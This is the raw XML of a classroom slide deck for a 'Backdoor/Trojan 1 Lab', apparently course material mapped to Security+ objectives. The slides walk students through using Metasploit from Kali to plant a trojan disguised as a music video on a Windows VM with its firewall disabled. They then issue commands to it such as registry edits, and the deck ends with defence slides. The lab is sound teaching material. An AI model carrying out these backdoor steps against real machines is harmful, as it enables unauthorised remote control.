                <a:latin typeface="Courier" panose="02060409020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" err="1">
                <a:latin typeface="Courier" panose="02060409020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>malicious_folder</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" b="1">
              <a:latin typeface="Courier" panose="02060409020205020404" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>You should see a folder appear on the desktop in the Windows VM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6451A0-389F-44C3-8420-3EC5AA3E8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449" y="1834608"/>
            <a:ext cx="3169354" cy="902727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CB5A7C-640B-45AC-8193-A6D78B77E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336" y="2540633"/>
            <a:ext cx="757324" cy="797184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A3370A-057F-4573-AD1C-65BEFED45A61}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="483617" y="3952905"/>
            <a:ext cx="7214531" cy="969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6595" tIns="16595" rIns="16595" bIns="16595" anchor="t">
            <a:normAutofit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sz="2091"/>
              <a:t>What else could possibly be done to Windows from the Kali VM?</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="628589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60D95-019E-43F5-9F25-A178EF90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Windows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0296E-8168-4CC1-A3B2-F7776B6C7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w Cen MT"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Launch an application directly from command line:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" indent="-224036"/>
            <a:r>
              <a:rPr lang="en-US" sz="1437" b="1">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>mspaint.exe</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US">
                <a:latin typeface="Tw Cen MT"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1437" b="1">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>calc.exe</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" indent="-224036"/>
            <a:r>
              <a:rPr lang="en-US">
                <a:latin typeface="Tw Cen MT"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Open a file in MS Paint: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1437" b="1">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>mspaint.exe "system-hacked.jpg"</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US">
                <a:latin typeface="Tw Cen MT"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Change the Windows desktop background color:</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US">
                <a:latin typeface="TW Cen MT"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1437" b="1">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>reg add "HKEY_CURRENT_USER\Control Panel\Colors" /v Background /t REG_SZ /d "60 219 192" /f</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US">
                <a:latin typeface="Tw Cen MT"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Remove desktop wallpaper (if there is one):</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US">
                <a:latin typeface="Tw Cen MT"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1437" b="1">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>reg add "HKEY_CURRENT_USER\Control Panel\Desktop" /v WallPaper /t REG_SZ /d " " /f</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="1437" b="1">
              <a:latin typeface="Courier"/>
              <a:cs typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1" indent="-224036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58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4E87-2A74-4FE9-B099-0CCD360E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Defend Against Backdoors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668D7-A838-4E1A-96D5-90119D523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" y="1703918"/>
            <a:ext cx="7360920" cy="3630082"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Use a firewall!</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Remember you disabled the firewall at the beginning of this lab</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Firewalls help prevent malicious software from sending out data without you knowing</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Do not run untrusted software</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Ask "Who/Where did this software come from?"</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Remember we pressed “Run” when Windows was telling us that this file could harm the system?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>What are some other ways of defending against a backdoor attack?</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="309114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4E87-2A74-4FE9-B099-0CCD360E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Defend Against Trojans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668D7-A838-4E1A-96D5-90119D523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Only download from trusted sources</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>What website did you download from?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Think before running a program</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Did Windows warn you before running the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" err="1"/>
              <a:t>trojan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>What are some other ways of defending against a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" err="1"/>
              <a:t>trojan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US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7834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9756-3C0E-4C4C-8F65-1B64191B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7ACC-7C5D-4DE2-8122-25A92276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Security+ Objectives (SY0-501)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Objective 1.1 – Given a scenario, analyze indicators of compromise and determine the type of malware </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Trojan</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Backdoor</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>DHS CAE Units</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>CTH – Describe different types of attacks and their characteristics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6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B2D6-DDCF-4D4B-B61A-2ED3C126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Backdoor Attack?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D8FE-5958-4695-9408-98B27A54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321" y="1790796"/>
            <a:ext cx="3598672" cy="3194834"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1437">
                <a:latin typeface="Tw Cen MT"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>A backdoor is when a malicious user gains privileged access to the system by circumventing normal authentication processes.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1437"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1437">
                <a:latin typeface="Tw Cen MT"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>In this lab, you will gain access to the Windows system's command prompt from the Linux command line</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1437">
                <a:latin typeface="Tw Cen MT"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>This lab’s end result is very similar to the Backdoor/Trojan 2 Lab</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1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07F65-894B-409B-9EFA-2FF316C90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726" y="2045299"/>
            <a:ext cx="3169354" cy="902727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8F040F-AEA4-496C-850C-F7DB8D5DD568}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4854599" y="3097098"/>
            <a:ext cx="2625609" cy="3351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595" tIns="16595" rIns="16595" bIns="16595" numCol="1" spcCol="38100" rtlCol="0" anchor="ctr">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr defTabSz="269673"/>
            <a:r>
              <a:rPr lang="en-US" sz="980"/>
              <a:t>Here a Linux machine is controlling a Windows machine via a backdoor</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="339211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B2D6-DDCF-4D4B-B61A-2ED3C126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is a Trojan?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D8FE-5958-4695-9408-98B27A54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320" y="1790796"/>
            <a:ext cx="4132072" cy="3194834"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1960">
                <a:latin typeface="Tw Cen MT"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>A Trojan horse attack is when the user thinks they are running a program on their computer, but it is actually something else</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1699">
                <a:latin typeface="Tw Cen MT"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>The </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1699" err="1">
                <a:latin typeface="Tw Cen MT"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>trojan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1699">
                <a:latin typeface="Tw Cen MT"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t> in this lab will set up a backdoor to allow other attacks in other labs</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1960">
                <a:latin typeface="Tw Cen MT"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>This lab is very similar to the Backdoor/Trojan 2 Lab</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1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BBC4F-7347-4A52-AF29-E7395BA89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607" y="1687400"/>
            <a:ext cx="2625609" cy="171298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3E5FBF-307D-423D-8DB1-BB7628014B96}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5217607" y="3525554"/>
            <a:ext cx="2625609" cy="4859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595" tIns="16595" rIns="16595" bIns="16595" numCol="1" spcCol="38100" rtlCol="0" anchor="ctr">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr defTabSz="269673"/>
            <a:r>
              <a:rPr lang="en-US" sz="980"/>
              <a:t>This Trojan is meant to look like a music video, but is actually a .exe file ready to open a backdoor on the system</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="242617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E3E-6FA8-4670-BC5C-02EF915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Backdoor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5B94-29D5-48B2-A6F8-F9E7433E2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616" y="1687398"/>
            <a:ext cx="3448500" cy="3194834"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="373394" indent="-373394">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US">
                <a:latin typeface="Tw Cen MT"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Setup VM environments</a:t>
            </a:r>
            <a:endParaRPr lang="en-US"/>
          </a:p>
          <a:p>
            <a:pPr marL="373394" indent="-373394">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US">
                <a:latin typeface="Tw Cen MT"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Initialize </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" err="1">
                <a:latin typeface="Tw Cen MT"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Metasploit</a:t>
            </a:r>
            <a:endParaRPr lang="en-US">
              <a:latin typeface="Tw Cen MT"/>
              <a:cs typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="373394" indent="-373394">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US">
                <a:latin typeface="Tw Cen MT"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Set-up the Attack</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="373394" indent="-373394">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US">
                <a:latin typeface="Tw Cen MT"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Launch the Attack</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="373394" indent="-373394">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US">
                <a:latin typeface="Tw Cen MT"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Install the Trojan</a:t>
            </a:r>
            <a:endParaRPr lang="en-US"/>
          </a:p>
          <a:p>
            <a:pPr marL="373394" indent="-373394">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US">
                <a:latin typeface="Tw Cen MT"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Start the Web Server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18D33A-11E8-438A-BB82-6BD23360D349}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4071734" y="1687398"/>
            <a:ext cx="3829698" cy="3194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6595" tIns="16595" rIns="16595" bIns="16595" anchor="t">
            <a:normAutofit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73394" indent="-373394" hangingPunct="1">
              <a:buAutoNum type="arabicPeriod" startAt="7"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2091">
                <a:latin typeface="Tw Cen MT"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t> Play the Victim</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2091">
              <a:cs typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="373394" indent="-373394" hangingPunct="1">
              <a:buAutoNum type="arabicPeriod" startAt="7"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2091">
                <a:latin typeface="Tw Cen MT"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t> Observe the Attack</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2091">
              <a:cs typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="373394" indent="-373394" hangingPunct="1">
              <a:buAutoNum type="arabicPeriod" startAt="7"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2091">
                <a:latin typeface="Tw Cen MT"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t> Access the Windows system</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="209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35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295" y="1579327"/>
            <a:ext cx="7360920" cy="3423035"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Log into your range</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Open the Kali Linux and Windows 7 Environments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You should be on your Kali Linux Desktop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You should also be on your Windows 7 Desktop</a:t>
            </a:r>
            <a:endParaRPr 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6335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011C-DF78-4134-94E1-CA748AC5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w Cen MT"/>
              </a:rPr>
              <a:t>Setup the VM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7A967-D208-49EC-A308-21F7E5073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Change your network location</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Click on the Windows Start button</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Search for “Network”</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Open the Network and Sharing Center program</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Under you Network #, click on the “Public Network”</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Select the “Home Network” option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latin typeface="Tw Cen MT"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>This disables the Windows Firewall and allows the attack.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AEF647-7A77-4287-B567-506ECCADA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662" y="1290428"/>
            <a:ext cx="2017410" cy="1444466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20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47EC-31E7-4056-AF66-8CA24552A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" y="340785"/>
            <a:ext cx="7757160" cy="1237192"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Find the IP Address (Kali Machine)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8B5DB-6E54-4C75-99F7-D5B878084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" y="1814288"/>
            <a:ext cx="6922516" cy="354828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w Cen MT"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>You will need the IP address of the Kali machine</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Tw Cen MT"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Open the Terminal</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Tw Cen MT"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>In the Linux VM, open the Terminal and type the following command:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>hostname -I</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Tw Cen MT"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>This will display the IP Address</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Tw Cen MT"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Write down the Kali VM IP address</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0"/>
          </a:p>
          <a:p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DBC0E2-34A1-4AB1-96B1-B76907D7A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803" y="3339789"/>
            <a:ext cx="3539097" cy="674114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21BD53-5F4A-45C7-8DA1-06845E118AD3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6138203" y="4417116"/>
            <a:ext cx="1517904" cy="184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595" tIns="16595" rIns="16595" bIns="16595" numCol="1" spcCol="38100" rtlCol="0" anchor="ctr">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr defTabSz="269673">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="980">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>The IP Address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306AE7-F1AE-450B-A06D-3FD65543C22B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5692141" y="3726183"/>
            <a:ext cx="1205014" cy="690933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7430821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21</TotalTime>
  <Words>1411</Words>
  <Application>Microsoft Office PowerPoint</Application>
  <PresentationFormat>Custom</PresentationFormat>
  <Paragraphs>181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Circe Light</vt:lpstr>
      <vt:lpstr>Courier</vt:lpstr>
      <vt:lpstr>Helvetica Neue</vt:lpstr>
      <vt:lpstr>Trebuchet MS</vt:lpstr>
      <vt:lpstr>TW Cen MT</vt:lpstr>
      <vt:lpstr>TW Cen MT</vt:lpstr>
      <vt:lpstr>Wingdings</vt:lpstr>
      <vt:lpstr>Berlin</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>Backdoor/Trojan 1 Lab</vt:lpstr>
      <vt:lpstr>Objectives Covered</vt:lpstr>
      <vt:lpstr>What is a Backdoor Attack?</vt:lpstr>
      <vt:lpstr>What is a Trojan?</vt:lpstr>
      <vt:lpstr>The Backdoor Lab</vt:lpstr>
      <vt:lpstr>Setup Environments</vt:lpstr>
      <vt:lpstr>Setup the VM Environments</vt:lpstr>
      <vt:lpstr>Find the IP Address (Kali Machine)</vt:lpstr>
      <vt:lpstr>Find the IP Address (Windows Machine)</vt:lpstr>
      <vt:lpstr>Initialize Metasploit</vt:lpstr>
      <vt:lpstr>Start the Backdoor Attack</vt:lpstr>
      <vt:lpstr>Setup the Backdoor Attack</vt:lpstr>
      <vt:lpstr>Check the Attack</vt:lpstr>
      <vt:lpstr>Start the Attack</vt:lpstr>
      <vt:lpstr>Install the Trojan</vt:lpstr>
      <vt:lpstr>Install the Trojan</vt:lpstr>
      <vt:lpstr>Start the Web Server</vt:lpstr>
      <vt:lpstr>Play the Victim</vt:lpstr>
      <vt:lpstr>Play the Victim</vt:lpstr>
      <vt:lpstr>Observe the Attack</vt:lpstr>
      <vt:lpstr>Observe the Attack</vt:lpstr>
      <vt:lpstr>Access the Windows System</vt:lpstr>
      <vt:lpstr>Other Windows Actions</vt:lpstr>
      <vt:lpstr>Defend Against Backdoors</vt:lpstr>
      <vt:lpstr>Defend Against Trojans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 and NICERC Overview</dc:title>
  <cp:lastModifiedBy>Richard Greene</cp:lastModifiedBy>
  <cp:revision>8</cp:revision>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2021-05-18T17:59:15Z</dcterms:modified>
</cp:coreProperties>
</file>